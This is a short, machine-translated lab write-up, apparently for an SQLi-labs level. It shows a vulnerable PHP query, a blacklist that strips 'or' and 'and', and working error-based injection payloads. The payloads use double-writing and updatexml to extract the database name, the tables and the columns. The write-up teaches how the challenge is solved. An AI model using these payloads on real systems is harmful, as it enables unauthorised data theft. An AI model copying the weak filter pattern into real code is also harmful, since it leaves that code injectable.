One 、 Code audit

1、 This is where the code meets the database , It can quickly judge the injection point and closing mode

 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

2、 This is filtered out using regular matching and and or,i The upper and lower case are filtered

function blacklist($id)
{
    
    $id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
    $id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)

    return $id;
}

Two 、SQL Inject

1、 Get the database

Here we bypass the filter by double writing , Double writing is equivalent to filtering out one and, But keep one and

?id=1' aandnd updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

2、 Get the data table

here infoorrmation Inside or Use double write , Pay attention to the point

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),0x7e),1)--+

3、 Get field

?id=1' aandnd updatexml(1,concat(0x7e,(select group_concat(column_name)from infoorrmation_schema.columns where table_name='users'),0x7e),1)--+